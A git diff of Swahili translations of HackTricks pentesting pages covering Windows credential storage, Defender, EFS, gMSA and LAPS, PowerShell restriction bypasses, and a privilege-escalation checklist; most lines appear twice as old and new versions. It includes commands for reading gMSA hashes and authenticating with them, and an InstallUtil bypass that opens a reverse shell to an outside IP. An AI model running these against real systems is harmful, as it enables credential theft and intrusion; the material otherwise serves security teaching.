LSA itakuwa ile itakayefanya **check** kwa credentials zilizotolewa ndani ya faili ya **SAM** (kwa login ya ndani) na **zungumza** na **domain controller** ili ku-authenticate mtumiaji wa domain.
Taarifa za kuingia zimeshifadhiwa ndani ya mchakato **LSASS**: tiketi za Kerberos, hashes NT na LM, nywila zinazoweza kufunguliwa kwa urahisi.
The **credentials** zimeshifadhiwa ndani ya **process LSASS**: Kerberos tickets, hashes NT na LM, nywila zinazoweza kufunuliwa kwa urahisi.
### LSA secrets
LSA inaweza kuhifadhi kwenye diski baadhi ya taarifa za kuingia:
LSA inaweza kuhifadhi kwenye diski baadhi ya credentials:
- Nywila ya akaunti ya kompyuta ya Active Directory (domain controller isiyoweza kufikiwa).
- Nywila ya akaunti ya kompyuta ya Active Directory (domain controller isiyoweza kupatikana).
- Nywila za akaunti za huduma za Windows
- Nywila za kazi zilizopangwa
- Zaidi (nywila za programu za IIS...)
- Nywila za scheduled tasks
- Zaidi (nywila za IIS applications...)
### NTDS.dit
Ni hifadhidata ya Active Directory. Ipo tu kwenye Domain Controllers.
Ni database ya Active Directory. Iko tu kwenye Domain Controllers.
## Defender
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) ni Antivirus inayopatikana katika Windows 10 na Windows 11, na katika toleo za Windows Server. Inazuia zana za kawaida za pentesting kama **`WinPEAS`**. Hata hivyo, kuna njia za **kupitisha ulinzi huu**.
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) ni Antivirus inayopatikana katika Windows 10 na Windows 11, na kwenye toleo za Windows Server. Inazuia zana za kawaida za pentesting kama **`WinPEAS`**. Hata hivyo, kuna njia za **kupita kinga hizi**.
### Check
Ili kukagua **hali** ya **Defender** unaweza kutekeleza PS cmdlet **`Get-MpComputerStatus`** (angalia thamani ya **`RealTimeProtectionEnabled`** kujua kama imewezeshwa):
Ili kukagua **status** ya **Defender** unaweza kutekeleza PS cmdlet **`Get-MpComputerStatus`** (angalia thamani ya **`RealTimeProtectionEnabled`** kujua kama iko hai):
<pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
@ -92,7 +92,7 @@ NISEngineVersion : 0.0.0.0
PSComputerName :
</code></pre>
Kwa ajili ya kuorodhesha pia unaweza kuendesha:
Ili kuorodhesha pia unaweza kuendesha:
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@ -103,102 +103,102 @@ sc query windefend
```
## Encrypted File System (EFS)
EFS inalinda faili kwa usimbaji, ikitumia **ufunguo wa simetriki** unaojulikana kama **File Encryption Key (FEK)**. Ufunguo huu unasimbwa kwa kutumia **public key** ya mtumiaji na kuhifadhiwa ndani ya $EFS **alternative data stream** ya faili iliyosimbwa. Wakati ufunguzi unahitajika, **private key** inayolingana ya cheti dijitali la mtumiaji inatumika kusimua FEK kutoka kwenye mfululizo wa $EFS. Maelezo zaidi yanaweza kupatikana [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
EFS inalinda faili kupitia usimbaji, ikitumia **ufunguo simetriki** unayejulikana kama **File Encryption Key (FEK)**. Ufunguo huu unasimbwa kwa kutumia **funguo la umma** la mtumiaji na unahifadhiwa ndani ya $EFS **alternative data stream** ya faili iliyosimbwa. Wakati ufungaji (decryption) unabidi, **funguo binafsi** inayofanana na cheti dijitali la mtumiaji inatumiwa kufungua FEK kutoka kwenye mtiririko wa $EFS. More details can be found [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
**Madaraja ya kuyafungua bila kuanzishwa na mtumiaji** ni pamoja na:
**Matukio ya kufungua (decryption) bila kuamshwa na mtumiaji** ni pamoja na:
- Wakati faili au folda zinapotamishwa kwenda kwenye mfumo wa faili usio wa EFS, kama [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), zinafutwa usimbaji kwa 자동.
- Faili zilizofichwa zinazotumwa kupitia mtandao kwa protokoli ya SMB/CIFS zinasimuliwa kabla ya kutumwa.
- Wakati faili au folda zinaposogezwa kwenye mfumo wa faili usio-EFS, kama [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), zinafufuliwa (decrypted) kwa njia ya moja kwa moja.
- Faili zilizofichwa zinazotumwa mtandaoni kwa kutumia itifaki ya SMB/CIFS zinafufuliwa kabla ya usafirishaji.
Njia hii ya usimbaji inaruhusu **ufikiaji wazi** wa faili zilizofichwa kwa mmiliki. Hata hivyo, kubadilisha nenosiri la mmiliki na kuingia tu hakutaruhusu kusimuliwa.
Njia hii ya usimbaji inaruhusu upatikanaji wa wazi kwa faili zilizofichwa kwa mmiliki. Hata hivyo, kubadilisha tu nywila ya mmiliki na kuingia haitawezi kuruhusu ufungaji.
**Mambo muhimu kukumbuka**:
Key Takeaways:
- EFS inatumia FEK wa simetriki, iliyosimbwa kwa public key ya mtumiaji.
- Kusimua kunatumia private key ya mtumiaji kupata FEK.
- Kusimuliwa kwa automatiki hutokea katika hali maalum, kama kunakopywa kwenye FAT32 au wakati wa usafirishaji wa mtandao.
- Faili zilizofichwa zinapatikana kwa mmiliki bila hatua za ziada.
- EFS inatumia FEK simetriki, iliyosimbwa kwa funguo la umma la mtumiaji.
- Kufungua (decryption) kunatumia funguo binafsi la mtumiaji kupata FEK.
- Kufunguka kwa njia ya moja kwa moja hufanyika katika hali maalum, kama kunakokopiwa kwenye FAT32 au kusafirishwa mtandaoni.
- Faili zilizofichwa zinaweza kupatikana na mmiliki bila hatua za ziada.
### Check EFS info
Angalia kama **mtumiaji** ame **tumia** **huduma** hii kwa kukagua kama njia hii ipo:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Angalia kama **mtumiaji** ame**tumia** huduma hii kwa kuangalia kama njia hii ipo: `C:\users\<username>\appdata\roaming\Microsoft\Protect`
Check **who** has **access** to the file using cipher /c \<file>\
Angalia **nani** ana **ufikiaji** wa faili ukitumia `cipher /c \<file>\`
Unaweza pia kutumia `cipher /e` na `cipher /d` ndani ya folda ili **encrypt** na **decrypt** faili zote
### Decrypting EFS files
#### Being Authority System
#### Kuwa System Authority
Njia hii inahitaji **mtumiaji wa mwathiriwa** kuwa **anazungusha** **mchakato** ndani ya host. Ikiwa hivyo ndio hali, kwa kutumia session za `meterpreter` unaweza kujifanya token ya mchakato wa mtumiaji (`impersonate_token` kutoka `incognito`). Au unaweza tu `migrate` kwenda mchakato wa mtumiaji.
Njia hii inahitaji **mtumiaji wa mwathiriwa** kuwa anae**endesha** **mchakato** ndani ya mwenyeji. Ikiwa hivyo ni kesi, kwa kutumia session za `meterpreter` unaweza kuiga token ya mchakato wa mtumiaji (`impersonate_token` kutoka `incognito`). Au unaweza tu `migrate` kwenda kwenye mchakato wa mtumiaji.
#### Knowing the users password
#### Kujua nywila za watumiaji
{{#ref}}
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
{{#endref}}
## Group Managed Service Accounts (gMSA)
## Akaunti za Group Managed Service (gMSA)
Microsoft ilitengeneza **Group Managed Service Accounts (gMSA)** kurahisisha usimamizi wa akaunti za service katika miundombinu ya IT. Tofauti na akaunti za service za jadi ambazo mara nyingi zinawekwa na sifa ya "**Password never expire**", gMSA zinatoa suluhisho salama na rahisi kusimamia:
Microsoft ilitengeneza **Group Managed Service Accounts (gMSA)** kurahisisha usimamizi wa akaunti za huduma katika miundombinu ya IT. Tofauti na akaunti za huduma za jadi ambazo mara nyingi zinawekwa na "Password never expire", gMSA zinatoa suluhisho salama zaidi na rahisi kusimamia:
- **Automatic Password Management**: gMSA zinatumia nenosiri tata la herufi 240 ambalo hubadilika kiotomatiki kulingana na sera za domain au kompyuta. Mchakato huu unafanywa na Key Distribution Service (KDC) ya Microsoft, kuondoa hitaji la masasisho ya nenosiri kwa mikono.
- **Enhanced Security**: Akaunti hizi hazifikiriwi kwa lockouts na hazitumiwi kwa interactive logins, hivyo kuongeza usalama.
- **Multiple Host Support**: gMSA zinaweza kushirikiwa kati ya host nyingi, zikifanya kuwa bora kwa services zinazoendesha kwenye server nyingi.
- **Automatic Password Management**: gMSA zinatumia nywila tata ya herufi 240 inayobadilika kiotomatiki kulingana na sera ya domain au kompyuta. Mchakato huu unafanywa na Key Distribution Service (KDC) ya Microsoft, kuondoa haja ya masasisho ya nywila kwa mikono.
- **Enhanced Security**: Akaunti hizi hazina uwezekano wa kufungwa (lockouts) na haiwezi kutumika kwa ingia ya mtumiaji wa kisasa (interactive logins), jambo linaloimarisha usalama wao.
- **Multiple Host Support**: gMSA zinaweza kushirikiwa kati ya hosts nyingi, hivyo zinafaa kwa huduma zinazotumika kwenye server nyingi.
- **Scheduled Task Capability**: Tofauti na managed service accounts, gMSA zinaunga mkono kuendesha scheduled tasks.
- **Simplified SPN Management**: Mfumo hubadilisha Service Principal Name (SPN) kiotomatiki wakati kuna mabadiliko kwa sAMaccount details za kompyuta au jina la DNS, kurahisisha usimamizi wa SPN.
- **Simplified SPN Management**: Mfumo hubadilisha kwa otomatiki Service Principal Name (SPN) pale panapobadilika sAMaccount details za kompyuta au jina la DNS, kurahisisha usimamizi wa SPN.
Nenosiri za gMSA zimetunzwa kwenye mali ya LDAP _**msDS-ManagedPassword**_ na hubadilishwa kiotomatiki kila siku 30 na Domain Controllers (DCs). Nenosiri hili, blob ya data iliyosimbwa inayojulikana kama [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), inaweza kuonekana tu na wasimamizi walioidhinishwa na server zinazoweka gMSA, kuhakikisha mazingira salama. Ili kupata taarifa hii, inahitaji muunganisho uliolindwa kama LDAPS, au muunganisho lazima uwe authenticated na 'Sealing & Secure'.
Nywila za gMSA zimo katika kipengele cha LDAP _**msDS-ManagedPassword**_ na zinasasishwa kiotomatiki kila siku 30 na Domain Controllers (DCs). Nywila hii, blob ya data iliyosimbwa inayojulikana kama [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), inaweza tu kutolewa na wasimamizi walioidhinishwa na servers ambazo gMSA zimewekwa, kuhakikisha mazingira salama. Ili kupata taarifa hii, inahitajika muunganisho uliolindwa kama LDAPS, au muunganisho lazima uwe authenticated na 'Sealing & Secure'.
![https://cube0x0.github.io/Relaying-for-gMSA/](../../images/asd1.png)
Unaweza kusoma nenosiri hili kwa kutumia [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
Unaweza kusoma nywila hii kwa kutumia [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
```
/GMSAPasswordReader --AccountName jkohler
```
[**Find more info in this post**](https://cube0x0.github.io/Relaying-for-gMSA/)
Pia, angalia [web page](https://cube0x0.github.io/Relaying-for-gMSA/) kuhusu jinsi ya kutekeleza **NTLM relay attack** ili **read** **password** ya **gMSA**.
Pia, angalia [web page](https://cube0x0.github.io/Relaying-for-gMSA/) kuhusu jinsi ya kufanya **NTLM relay attack** ili **kusoma** **nenosiri** la **gMSA**.
### Kutumia vibaya mnyororo wa ACL kusoma password iliyosimamiwa ya gMSA (GenericAll -> ReadGMSAPassword)
### Abusing ACL chaining to read gMSA managed password (GenericAll -> ReadGMSAPassword)
Katika mazingira mengi, watumiaji wenye vigezo vya chini wanaweza kupitisha kwa siri za gMSA bila kuathiri DC kwa kutumia vibaya ACL za vitu zilizopangwa vibaya:
Katika mazingira mengi, watumiaji wenye ruhusa ndogo wanaweza kufikia siri za gMSA bila kuharibu DC kwa kunyanyasa ACLs za vitu zilizo na usanidi mbaya:
- Kundi unachosimamia (mfano, via GenericAll/GenericWrite) umepewa `ReadGMSAPassword` juu ya gMSA.
- Kwa kujiunga na kundi hilo, unapata haki ya read blob ya `msDS-ManagedPassword` ya gMSA kupitia LDAP na kupata NTLM credentials zinazotumika.
- Kundi unachoweza kudhibiti (kwa mfano, kupitia GenericAll/GenericWrite) kimetolewa ruhusa ya `ReadGMSAPassword` juu ya gMSA.
- Kwa kujiongeza kwenye kundi hilo, unapata haki ya kusoma blob ya `msDS-ManagedPassword` ya gMSA kupitia LDAP na kupata vigezo vya NTLM vinavyoweza kutumika.
Mtiririko wa kawaida wa kazi:
Typical workflow:
1) Gundua njia kwa kutumia BloodHound na taja principals zako za foothold kama Owned. Angalia edges kama:
1) Gundua njia kwa kutumia BloodHound na bainisha foothold principals zako kama Owned. Tafuta edges kama:
- GroupA GenericAll -> GroupB; GroupB ReadGMSAPassword -> gMSA
2) Jumuisha wewe mwenyewe katika kundi la kati unaolisimamia (mfano kwa bloodyAD):
2) Jiongeze kwenye kundi la kati unalodhibiti (mfano kwa bloodyAD):
```bash
bloodyAD --host <DC.FQDN> -d <domain> -u <user> -p <pass> add groupMember <GroupWithReadGmsa> <user>
```
3) Soma neno la siri la gMSA linalosimamiwa kupitia LDAP na tengeneza hash ya NTLM. NetExec inafanya otomatiki uondoaji wa `msDS-ManagedPassword` na uongofu hadi NTLM:
3) Soma nenosiri la gMSA lililodhibitiwa kupitia LDAP na pata hash ya NTLM. NetExec inafanya kwa otomatiki uondoaji wa `msDS-ManagedPassword` na kuibadilisha kuwa NTLM:
```bash
# Shows PrincipalsAllowedToReadPassword and computes NTLM automatically
netexec ldap <DC.FQDN> -u <user> -p <pass> --gmsa
# Account: mgtsvc$ NTLM: edac7f05cded0b410232b7466ec47d6f
```
4) Thibitisha kama gMSA ukitumia NTLM hash (plaintext haidingiki). Ikiwa akaunti iko katika Remote Management Users, WinRM itafanya kazi moja kwa moja:
4) Thibitisha kama gMSA ukitumia NTLM hash (hakuna plaintext inayohitajika). Ikiwa akaunti iko katika Remote Management Users, WinRM itafanya kazi moja kwa moja:
```bash
# SMB / WinRM as the gMSA using the NT hash
netexec smb <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
netexec winrm <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
```
Vidokezo:
- Usomaji wa LDAP wa `msDS-ManagedPassword` unahitaji sealing (mfano: LDAPS/sign+seal). Zana zinashughulikia hili moja kwa moja.
- gMSAs mara nyingi hupewa haki za ndani kama WinRM; thibitisha uanachama wa kikundi (mfano: Remote Management Users) ili kupanga lateral movement.
- Ikiwa unahitaji blob tu ili kuhesabu NTLM wewe mwenyewe, ona muundo wa MSDS-MANAGEDPASSWORD_BLOB.
Notes:
- LDAP reads of `msDS-ManagedPassword` require sealing (e.g., LDAPS/sign+seal). Zana zinasimamia hili kiotomatiki.
- gMSAs are often granted local rights like WinRM; thibitisha uanachama wa vikundi (e.g., Remote Management Users) ili kupanga lateral movement.
- If you only need the blob to compute the NTLM yourself, see MSDS-MANAGEDPASSWORD_BLOB structure.
## LAPS
The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), inaruhusu usimamizi wa nywila za Administrator wa mkoa. Nywila hizi, ambazo ni **zilizoanzishwa kwa nasibu**, za kipekee, na **zinabadilishwa mara kwa mara**, zinahifadhiwa kati katika Active Directory. Upatikanaji wa nywila hizi umefungwa kupitia ACLs kwa watumiaji walioteuliwa. Ikiwa ruhusa za kutosha zimepewa, uwezo wa kusoma nywila za admin wa mkoa unapatikana.
The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), inaruhusu usimamizi wa nywila za local Administrator. Nywila hizi, ambazo ni **randomized**, za kipekee, na **regularly changed**, zinahifadhiwa katikati katika Active Directory. Upataji wa nywila hizi umepunguzwa kupitia ACLs kwa watumiaji walioidhinishwa. Ikiwa ruhusa za kutosha zimepewa, uwezo wa kusoma nywila za admin wa ndani unapatikana.
{{#ref}}
@ -207,22 +207,22 @@ The **Local Administrator Password Solution (LAPS)**, available for download fro
## PS Constrained Language Mode
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **inazuia vipengele vingi** vinavyohitajika ili kutumia PowerShell kwa ufanisi, kama kuzuia COM objects, kuruhusu tu aina za .NET zilizokubaliwa, XAML-based workflows, PowerShell classes, na zaidi.
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **inazuia vipengele vingi** vinavyohitajika kutumia PowerShell kwa ufanisi, kama vile kuzuia COM objects, kuruhusu tu aina za .NET zilizokubaliwa, XAML-based workflows, PowerShell classes, na zaidi.
### **Kagua**
### **Angalia**
```bash
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
### Kuvuka
### Bypass
```bash
#Easy bypass
Powershell -version 2
```
Kwenye Windows za sasa bypass hiyo haitafanya kazi lakini unaweza kutumia [ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
**Ili kuikompaila unaweza kuhitaji** **kufanya** _**Add a Reference**_ -> _Browse_ -> _Browse_ -> ongeza `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` na **badilisha project kuwa .Net4.5**.
Katika Windows za sasa Bypass hiyo haitafanya kazi lakini unaweza kutumia[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
**Ili kuikompaila huenda ukahitaji** **_Ongeza Marejeo_** -> _Vinjari_ -> _Vinjari_ -> ongeza `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` na **badilisha mradi kuwa .Net4.5**.
#### Bypass ya moja kwa moja:
#### Moja kwa moja bypass:
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
```
@ -230,11 +230,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **kutekeleza Powershell** code katika mchakato wowote na kuepuka constrained mode. Kwa taarifa zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **execute Powershell** code katika mchakato wowote na bypass constrained mode. Kwa maelezo zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
## Sera ya Utekelezaji ya PS
Kwa chaguo-msingi imewekwa kuwa **restricted.** Njia kuu za kuepuka sera hii:
Kwa chaguo-msingi imewekwa kuwa **restricted.** Njia kuu za bypass sera hii:
```bash
1º Just copy and paste inside the interactive PS console
2º Read en Exec
@ -254,32 +254,32 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
Zaidi zinaweza kupatikana [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
Taarifa zaidi zinaweza kupatikana [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
## Security Support Provider Interface (SSPI)
## Kiolesura cha Security Support Provider (SSPI)
Ni API inayotumika kuthibitisha watumiaji.
Ni API inayoweza kutumika kuthibitisha watumiaji.
SSPI itawajibika kutafuta itifaki inayofaa kwa mashine mbili zinazotaka kuwasiliana. Njia inayopendekezwa kwa hili ni Kerberos. Kisha SSPI itajadili itifaki gani ya uthibitishaji itakayotumika; itifaki hizi za uthibitishaji zinaitwa Security Support Provider (SSP), ziko ndani ya kila mashine ya Windows kama DLL na mashine zote mbili lazima ziunge mkono ile ile ili ziweze kuwasiliana.
SSPI itakuwa na jukumu la kupata itifaki inayofaa kwa mashine mbili zinazotaka kuwasiliana. Njia inayopendekezwa kwa hili ni Kerberos. Kisha SSPI itajadili ni itifaki gani ya uthibitishaji itakayotumika; itifaki hizi za uthibitishaji zinaitwa Security Support Provider (SSP), ziko ndani ya kila mashine ya Windows kwa muundo wa DLL na mashine zote mbili lazima ziunge mkono ile ile ili ziweze kuwasiliana.
### SSP kuu
- **Kerberos**: Inayopendekezwa
- %windir%\Windows\System32\kerberos.dll
- **NTLMv1** and **NTLMv2**: Sababu za utangamano
- **NTLMv1** and **NTLMv2**: Kwa sababu za utangamano
- %windir%\Windows\System32\msv1_0.dll
- **Digest**: Web servers na LDAP, nenosiri kwa fomu ya MD5 hash
- **Digest**: Seva za wavuti na LDAP, nywila katika fomu ya hash ya MD5
- %windir%\Windows\System32\Wdigest.dll
- **Schannel**: SSL and TLS
- **Schannel**: SSL na TLS
- %windir%\Windows\System32\Schannel.dll
- **Negotiate**: Inatumika kujadiliana itifaki ya kutumia (Kerberos au NTLM, Kerberos ikiwa chaguo-msingi)
- **Negotiate**: Inatumika kujadiliana itifaki itakayotumika (Kerberos au NTLM, Kerberos ikiwa chaguo-msingi)
- %windir%\Windows\System32\lsasrv.dll
#### Mazungumzo yanaweza kutoa njia kadhaa au njia moja tu.
## UAC - User Account Control
## UAC - Udhibiti wa Akaunti ya Mtumiaji (User Account Control)
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **maombi ya idhini kwa shughuli zinazohitaji ruhusa ya juu**.
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **ombi la ridhaa kwa shughuli zinazohitaji ruhusa za juu**.
{{#ref}}

102
src/windows-hardening/checklist-windows-privilege-escalation.md
View File

@ -1,88 +1,88 @@
# Orodha ya ukaguzi - Local Windows Privilege Escalation
# Orodha ya Ukaguzi - Local Windows Privilege Escalation
{{#include ../banners/hacktricks-training.md}}
### **Zana bora ya kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
### **Chombo bora cha kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
### [System Info](windows-local-privilege-escalation/index.html#system-info)
### [Taarifa za Mfumo](windows-local-privilege-escalation/index.html#system-info)
- [ ] Pata [**System information**](windows-local-privilege-escalation/index.html#system-info)
- [ ] Pata [**Taarifa za Mfumo**](windows-local-privilege-escalation/index.html#system-info)
- [ ] Tafuta **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits)
- [ ] Tumia **Google to search** for kernel **exploits**
- [ ] Tumia **searchsploit to search** for kernel **exploits**
- [ ] Kuna taarifa ya kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)?
- [ ] Manenosiri katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
- [ ] Taarifa za kuvutia katika [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
- [ ] Tumia **Google** kutafuta kernel **exploits**
- [ ] Tumia **searchsploit** kutafuta kernel **exploits**
- [ ] Je, kuna taarifa za kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)?
- [ ] Je, kuna nywila katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
- [ ] Je, kuna taarifa za kuvutia katika [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)?
- [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)?
- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
- [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)?
### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)
### [Uchunguzi wa Logging/AV](windows-local-privilege-escalation/index.html#enumeration)
- [ ] Angalia [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) na [**WEF** ](windows-local-privilege-escalation/index.html#wef) mipangilio
- [ ] Angalia [**LAPS**](windows-local-privilege-escalation/index.html#laps)
- [ ] Angalia ikiwa [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) inafanya kazi
- [ ] Kagua [**Audit**](windows-local-privilege-escalation/index.html#audit-settings) na [**WEF**](windows-local-privilege-escalation/index.html#wef) mipangilio
- [ ] Kagua [**LAPS**](windows-local-privilege-escalation/index.html#laps)
- [ ] Kagua kama [**WDigest**](windows-local-privilege-escalation/index.html#wdigest) iko imewezeshwa
- [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)?
- [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
- [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)?
- [ ] Angalia ikiwa kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
- [ ] Kagua kama kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
- [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
- [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
- [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Angalia [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Kagua [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
- [ ] Je, wewe ni [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)?
- [ ] Angalia ikiwa una [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
- [ ] Kagua kama una [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
- [ ] Angalia[ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (ufikia?)
- [ ] Angalia [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
- [ ] Nini kimepo[ **inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
- [ ] Kagua [ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (ufikaji?)
- [ ] Kagua [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
- [ ] Kuna nini [ **katika Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
### [Network](windows-local-privilege-escalation/index.html#network)
### [Mtandao](windows-local-privilege-escalation/index.html#network)
- [ ] Angalia **current** [**network** **information**](windows-local-privilege-escalation/index.html#network)
- [ ] Angalia **hidden local services** zinazopatikana kutoka nje
- [ ] Kagua [**taarifa za mtandao**](windows-local-privilege-escalation/index.html#network) ya sasa
- [ ] Kagua huduma za ndani zilizofichika zinazotengwa kwa nje
### [Running Processes](windows-local-privilege-escalation/index.html#running-processes)
### [Michakato Inayoendeshwa](windows-local-privilege-escalation/index.html#running-processes)
- [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
- [ ] Idhini za [**file and folders**] za binaries za michakato (permissions) (windows-local-privilege-escalation/index.html#file-and-folder-permissions)
- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining)
- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
- [ ] Pora credentials kwa **interesting processes** kwa kutumia `ProcDump.exe` ? (firefox, chrome, etc ...)
- [ ] Pora nywila kwa michakato yenye [**vitu vya kuvutia**] kwa kutumia `ProcDump.exe` ? (firefox, chrome, n.k.)
### [Services](windows-local-privilege-escalation/index.html#services)
- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions)
- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)
- [ ] Je, unaweza **kubadilisha service yoyote**? (windows-local-privilege-escalation/index.html#permissions)
